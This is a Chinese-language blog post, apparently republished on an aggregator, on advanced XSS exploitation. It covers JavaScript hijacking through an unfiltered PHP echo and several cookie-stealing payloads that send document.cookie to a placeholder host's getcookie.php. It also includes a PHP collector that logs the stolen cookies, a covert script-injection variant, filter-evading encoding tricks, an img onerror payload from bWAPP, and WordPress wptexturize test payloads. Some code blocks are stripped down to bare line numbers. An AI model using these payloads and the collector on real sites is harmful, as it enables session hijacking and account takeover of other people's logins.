點擊閱讀

利用 xss 的 javascript 劫持

一個 xss 漏洞示例頁面

1

2

3

4

5

6

7

8

9

10

$xss = @$_GET['xss'];

if($xss!==null){

echo $xss;

}

?>

這段代碼中首先包含一個表單，用于向頁面自己發(fā)送 GET 請求，帶一個名為 xss 的參數(shù)。 然后 PHP 會讀取該參數(shù)，如果不為空，則直接打印出來，這里不存在任何過濾。也就是說，如果 xss 中存在 HTML 結構性的內容，打印之后會直接解釋為 HTML 元素

例如

1

2

3

4

5

6

7

8

9

10

Javascript Hijack with XSS

script.js 內容為

1

2

3

4

function Hello()

{

alert("hi");

}

當傳入 xss 為

xss=function Hello() { alert("hacked"); } 時

鼠標點擊會彈出 hacked 而非預定的 hi

這里利用 xss 漏洞劫持 javascript 代碼

可以傳入以執(zhí)行較長的代碼

XSS 會話劫持

可以在含 xss 漏洞的地方使用以下類似代碼盜取 cookie

window.open("http://x.x.x.x/getcookie.php?cookie="+document.cookie)

或

document.location="http://x.x.x.x/getcookie.php?cookie="+document.cookie;

getcookie.php:

1

2

3

4

5

$cookie=@$_GET['cookie'];

$path="./cookies.txt";

file_put_contents($path,$cookie.PHP_EOL, FILE_APPEND);

?>

為防止察覺，使用 javascript

script.js:

1

2

3

var script =document.createElement('script');

script.src='http://x.x.x.x/getcookie.php?cookie='+escape(document.cookie);

document.body.appendChild(script);

xss 常用的編碼

bWAPP 中的 XSS - Reflected (AJAX/XML)

輸入 <img src=1 οnerrοr="alert(document.cookie)">

彈窗獲取 cookie

<、>分別為的 HTML tag

第一個，html 實體編碼，例如：

alert()

第二個，進制類，例如：

x61x6cx65x72x74x60x78x73x73x60

某些時候，也有不帶 x,例如：5c6a

第三個，Unicode，例如：

u0061u006cu0065u0072u0074u0060u4e2du6587u4e5fu53efu4ee5u0060

第四個，純轉義，例如：

' " < >

這樣的在特殊字符前加進行轉義。

html 標簽中：

1

2

3

4

5

html中當然會支持html實體編碼，例如=，也有<

支持十六進制，但是要以開頭，其中x大寫小寫無所謂。

支持十進制，要以開頭，注意，沒有x哦。

支持數(shù)字部分高位補充0，例如=，=這兩是一樣的。

可能你已經(jīng)發(fā)現(xiàn)了，后綴有沒有; 都無所謂

javascript 中：

1

2

3

eval函數(shù)里，支持十六進制，但是要以 x 開頭，x只能小寫！必須兩位，例如：x5c

eval函數(shù)里，支持八進制，但是要以 開頭。必須兩位，例如：134

eval函數(shù)里，還支持u前綴的unicode，本質是：16進制的ascii碼。必須是四位，例如：u005c

WordPress XSS 漏洞

于是下載了 wordpress-3.8.3 在虛擬機測試

發(fā)現(xiàn)管理員登陸時，編輯內容并不會被過濾

編輯文章，回到首頁查看

但是 chrome 下彈出的 cookie 似乎被過濾了，最關鍵的部分并沒有，利用 js 在服務器上獲取的 cookie 同樣不完整

firefox 下卻沒問題

以下兩個地方都被插入了代碼，也會彈出兩次

標題

側欄

去官網(wǎng)下了個最新版 WordPress

管理員的編輯仍不會被過濾

接收到 cookie

wordpress 站點有多個用戶，當不是管理員時

漏洞的成因是在/wp-includes/formatting.php 中的 wptexturize 函數(shù)

formatting.php 應該是用于清理 XHTML 和用特定字符集正確格式化文本

1

2

3

4

5

6

7

8

9

10

11

12

13

function wptexturize($text) {

......

$textarr = preg_split('/(<.>|[.*])/Us', $text, -1, PREG_SPLIT_DELIM_CAPTURE);

foreach ( $textarr as &$curl ) {

......

}

return implode( '', $textarr );

}

這里的正則/(<.>|[.*])/Us會匹配

1

2

3

4

5

6

7

//這個新姿勢能在前臺xss彈窗 不限制用戶權限 后臺的確不能彈窗

[["][a>alert(1)]

前后臺都能彈窗 似乎還是老的onmouseover能用

[[" NOT VULNERABLE]

然而我發(fā)現(xiàn)這 payload 沒什么效果，有時間再好好看看，完善一下

總結

以上是生活随笔為你收集整理的ajax在Xss中的利用,XSS高级利用的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。